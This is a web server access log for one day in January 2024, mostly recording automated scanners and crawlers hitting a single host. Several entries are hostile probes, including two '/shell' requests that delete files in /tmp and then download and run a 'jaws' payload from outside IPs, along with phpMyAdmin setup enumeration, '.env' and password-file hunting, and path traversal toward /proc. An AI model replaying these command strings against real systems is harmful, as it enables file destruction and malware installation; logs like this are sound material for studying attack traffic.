185.142.236.41 - - [03/Jan/2024:01:16:40 -0600] "GET /robots.txt HTTP/1.1" 404 435 "-" "-" 185.142.236.41 - - [03/Jan/2024:01:16:42 -0600] "GET /sitemap.xml HTTP/1.1" 404 435 "-" "-" 185.142.236.41 - - [03/Jan/2024:01:16:45 -0600] "GET /.well-known/security.txt HTTP/1.1" 404 435 "-" "-" 185.142.236.41 - - [03/Jan/2024:01:17:02 -0600] "GET /favicon.ico HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"

83.97.73.245 - - [03/Jan/2024:01:30:07 -0600] "GET /actuator/gateway/routes HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

62.210.90.216 - - [03/Jan/2024:01:33:07 -0600] "HEAD / HTTP/1.1" 200 226 "-" "curl/7.81.0" 62.210.90.216 - - [03/Jan/2024:01:33:11 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" 62.210.90.216 - - [03/Jan/2024:01:33:12 -0600] "GET /favicon.ico HTTP/1.1" 404 490 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"

222.185.194.14 - - [03/Jan/2024:01:47:45 -0600] "GET /shell?cd+/tmp;rm+-rf+*;wget+193.233.203.76/jaws;sh+/tmp/jaws HTTP/1.1" 404 488 "-" "Hello, world"

114.242.99.122 - - [03/Jan/2024:02:13:38 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"

185.224.128.191 - - [03/Jan/2024:02:14:00 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

221.156.244.215 - - [03/Jan/2024:03:03:38 -0600] "GET /shell?cd+/tmp;rm+-rf+*;wget+121.62.21.23/jaws;sh+/tmp/jaws HTTP/1.1" 404 488 "-" "Hello, world"

192.241.217.36 - - [03/Jan/2024:03:36:04 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

91.92.243.232 - - [03/Jan/2024:04:25:32 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.243.232 - - [03/Jan/2024:04:25:34 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

78.153.140.219 - - [03/Jan/2024:04:52:54 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 78.153.140.219 - - [03/Jan/2024:04:52:54 -0600] "\x16\x03\x01\x01H\x01" 400 0 "-" "-"

91.92.243.232 - - [03/Jan/2024:06:16:29 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.243.232 - - [03/Jan/2024:06:16:35 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

134.209.169.87 - - [03/Jan/2024:08:03:44 -0600] "\x16\x03\x01" 400 0 "-" "-" 134.209.169.87 - - [03/Jan/2024:08:03:50 -0600] "GET /wp-content/plugins/media-library-assistant/readme.txt HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; KFTT Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Silk/2.1 Mobile Safari/535.19 Silk-Accelerated=true"

180.149.125.164 - - [03/Jan/2024:10:59:23 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"

45.95.147.251 - - [03/Jan/2024:11:10:54 -0600] "POST /boaform/admin/formLogin HTTP/1.1" 404 491 "http://67.218.15.25:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"

91.92.243.232 - - [03/Jan/2024:11:22:04 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.243.232 - - [03/Jan/2024:11:22:07 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

120.237.168.25 - - [03/Jan/2024:11:25:18 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"

185.134.22.149 - - [03/Jan/2024:12:17:46 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 infrawatch/0.1" 185.134.22.149 - - [03/Jan/2024:12:17:47 -0600] "GET /systembc/password.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 infrawatch/0.1" 185.134.22.149 - - [03/Jan/2024:12:17:47 -0600] "GET /Ep1v HTTP/1.1" 404 435 "-" "Mozilla/5.0 infrawatch/0.1" 185.134.22.149 - - [03/Jan/2024:12:17:47 -0600] "GET /GWqN HTTP/1.1" 404 435 "-" "Mozilla/5.0 infrawatch/0.1"

80.66.88.215 - - [03/Jan/2024:12:25:20 -0600] "\x03" 400 0 "-" "-"

59.49.77.211 - - [03/Jan/2024:12:53:24 -0600] "GET http://67.218.15.25:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:25 -0600] "GET http://67.218.15.25:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:25 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:26 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:26 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:27 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:28 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:28 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:29 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:29 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:30 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:30 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:31 -0600] "GET http://67.218.15.25:80/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:31 -0600] "GET http://67.218.15.25:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:31 -0600] "GET http://67.218.15.25:80/myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:32 -0600] "GET http://67.218.15.25:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:32 -0600] "GET http://67.218.15.25:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:33 -0600] "GET http://67.218.15.25:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:33 -0600] "GET http://67.218.15.25:80/SQL/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:34 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:34 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:35 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:35 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:35 -0600] "GET http://67.218.15.25:80/admin/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:36 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:36 -0600] "GET http://67.218.15.25:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:37 -0600] "GET http://67.218.15.25:80/webadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:37 -0600] "GET http://67.218.15.25:80/admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:38 -0600] "GET http://67.218.15.25:80/dbadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:38 -0600] "GET http://67.218.15.25:80/mysql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:39 -0600] "GET http://67.218.15.25:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:39 -0600] "GET http://67.218.15.25:80/phpma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:40 -0600] "GET http://67.218.15.25:80/sqlweb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:40 -0600] "GET http://67.218.15.25:80/webdb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:40 -0600] "GET http://67.218.15.25:80/websql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:41 -0600] "GET http://67.218.15.25:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:41 -0600] "GET http://67.218.15.25:80/php/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:42 -0600] "GET http://67.218.15.25:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:42 -0600] "GET http://67.218.15.25:80/db/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:43 -0600] "GET http://67.218.15.25:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:43 -0600] "GET http://67.218.15.25:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:44 -0600] "GET http://67.218.15.25:80/phpmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:44 -0600] "GET http://67.218.15.25:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:44 -0600] "GET http://67.218.15.25:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 59.49.77.211 - - [03/Jan/2024:12:53:45 -0600] "GET http://67.218.15.25:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-"

94.102.61.10 - - [03/Jan/2024:13:43:42 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"

198.199.107.105 - - [03/Jan/2024:16:09:44 -0600] "MGLNDD_67.218.15.25_80\n" 400 0 "-" "-"

109.205.213.198 - - [03/Jan/2024:16:17:42 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

141.98.11.136 - - [03/Jan/2024:16:36:19 -0600] "\x03" 400 0 "-" "-"

47.88.101.3 - - [03/Jan/2024:16:41:18 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36" 47.88.101.3 - - [03/Jan/2024:16:41:18 -0600] "GET /Public/home/js/check.js HTTP/1.1" 404 490 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"

47.88.90.156 - - [03/Jan/2024:16:41:19 -0600] "GET /static/admin/javascript/hetong.js HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"

170.64.141.178 - - [03/Jan/2024:17:49:38 -0600] "\x16\x03\x01" 400 0 "-" "-" 170.64.141.178 - - [03/Jan/2024:17:49:39 -0600] "\x16\x03\x01" 400 0 "-" "-" 170.64.141.178 - - [03/Jan/2024:17:49:39 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 170.64.141.178 - - [03/Jan/2024:17:49:40 -0600] "GET /form.html HTTP/1.1" 404 435 "-" "curl/8.1.2" 170.64.141.178 - - [03/Jan/2024:17:49:40 -0600] "GET /upl.php HTTP/1.1" 404 435 "-" "Mozilla/5.0" 170.64.141.178 - - [03/Jan/2024:17:49:41 -0600] "\x16\x03\x01" 400 0 "-" "-" 170.64.141.178 - - [03/Jan/2024:17:49:41 -0600] "GET /geoip/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 170.64.141.178 - - [03/Jan/2024:17:49:41 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 170.64.141.178 - - [03/Jan/2024:17:49:42 -0600] "GET /1.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 170.64.141.178 - - [03/Jan/2024:17:49:42 -0600] "GET /bundle.js HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 170.64.141.178 - - [03/Jan/2024:17:49:43 -0600] "GET /files/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 170.64.141.178 - - [03/Jan/2024:17:49:43 -0600] "GET /systembc/password.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 170.64.141.178 - - [03/Jan/2024:17:49:44 -0600] "GET /password.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 170.64.141.178 - - [03/Jan/2024:17:49:44 -0600] "GET /info.php HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

185.142.236.43 - - [03/Jan/2024:17:59:08 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 185.142.236.43 - - [03/Jan/2024:17:59:09 -0600] "GET /robots.txt HTTP/1.1" 404 435 "-" "-" 185.142.236.43 - - [03/Jan/2024:17:59:10 -0600] "GET /sitemap.xml HTTP/1.1" 404 435 "-" "-" 185.142.236.43 - - [03/Jan/2024:17:59:10 -0600] "GET /.well-known/security.txt HTTP/1.1" 404 435 "-" "-" 185.142.236.43 - - [03/Jan/2024:17:59:43 -0600] "GET /favicon.ico HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"

167.94.145.53 - - [03/Jan/2024:18:15:14 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 167.94.145.53 - - [03/Jan/2024:18:15:19 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.145.53 - - [03/Jan/2024:18:15:19 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.94.145.53 - - [03/Jan/2024:18:15:20 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

209.191.192.102 - - [03/Jan/2024:18:30:20 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"

35.187.98.121 - - [03/Jan/2024:18:47:26 -0600] "GET / HTTP/1.1" 200 297 "-" "python-requests/2.31.0"

219.151.149.190 - - [03/Jan/2024:18:53:27 -0600] "GET http://67.218.15.25:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:28 -0600] "GET http://67.218.15.25:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:30 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:31 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:32 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:34 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:35 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:37 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:38 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:39 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:40 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:40 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:41 -0600] "GET http://67.218.15.25:80/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:41 -0600] "GET http://67.218.15.25:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:42 -0600] "GET http://67.218.15.25:80/myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:42 -0600] "GET http://67.218.15.25:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:43 -0600] "GET http://67.218.15.25:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:43 -0600] "GET http://67.218.15.25:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:43 -0600] "GET http://67.218.15.25:80/SQL/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:44 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:44 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:45 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:45 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:46 -0600] "GET http://67.218.15.25:80/admin/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:46 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:47 -0600] "GET http://67.218.15.25:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:47 -0600] "GET http://67.218.15.25:80/webadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:48 -0600] "GET http://67.218.15.25:80/admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:49 -0600] "GET http://67.218.15.25:80/dbadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:49 -0600] "GET http://67.218.15.25:80/mysql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:50 -0600] "GET http://67.218.15.25:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:50 -0600] "GET http://67.218.15.25:80/phpma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:51 -0600] "GET http://67.218.15.25:80/sqlweb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:51 -0600] "GET http://67.218.15.25:80/webdb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:52 -0600] "GET http://67.218.15.25:80/websql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:52 -0600] "GET http://67.218.15.25:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:53 -0600] "GET http://67.218.15.25:80/php/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:53 -0600] "GET http://67.218.15.25:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:54 -0600] "GET http://67.218.15.25:80/db/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:54 -0600] "GET http://67.218.15.25:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:55 -0600] "GET http://67.218.15.25:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:55 -0600] "GET http://67.218.15.25:80/phpmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:56 -0600] "GET http://67.218.15.25:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:56 -0600] "GET http://67.218.15.25:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 219.151.149.190 - - [03/Jan/2024:18:53:57 -0600] "GET http://67.218.15.25:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-"

107.170.240.35 - - [03/Jan/2024:19:34:48 -0600] "GET /manager/text/list HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

167.94.138.34 - - [03/Jan/2024:19:59:49 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 167.94.138.34 - - [03/Jan/2024:19:59:53 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.138.34 - - [03/Jan/2024:19:59:53 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.94.138.34 - - [03/Jan/2024:19:59:53 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

71.6.232.23 - - [03/Jan/2024:20:01:22 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"

14.103.46.69 - - [03/Jan/2024:20:49:12 -0600] "GET http://67.218.15.25:80/SQL/scripts/setup.php HTTP/1.0" 404 454 "-" "-"

205.210.31.229 - - [03/Jan/2024:20:58:00 -0600] "\x16\x03\x01" 400 0 "-" "-" 205.210.31.229 - - [03/Jan/2024:20:58:00 -0600] "\x16\x03\x01" 400 0 "-" "-"

45.33.87.154 - - [03/Jan/2024:21:08:53 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

45.79.181.223 - - [03/Jan/2024:21:11:56 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

45.95.147.251 - - [03/Jan/2024:21:19:59 -0600] "POST /boaform/admin/formLogin HTTP/1.1" 404 491 "http://67.218.15.25:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"

205.210.31.3 - - [03/Jan/2024:21:23:16 -0600] "GET / HTTP/1.0" 200 260 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

184.105.247.252 - - [03/Jan/2024:21:51:59 -0600] "\x16\x03\x01" 400 0 "-" "-"

80.79.117.42 - - [03/Jan/2024:22:10:48 -0600] "GET / HTTP/1.0" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"

141.98.11.136 - - [03/Jan/2024:22:13:05 -0600] "\x03" 400 0 "-" "-"

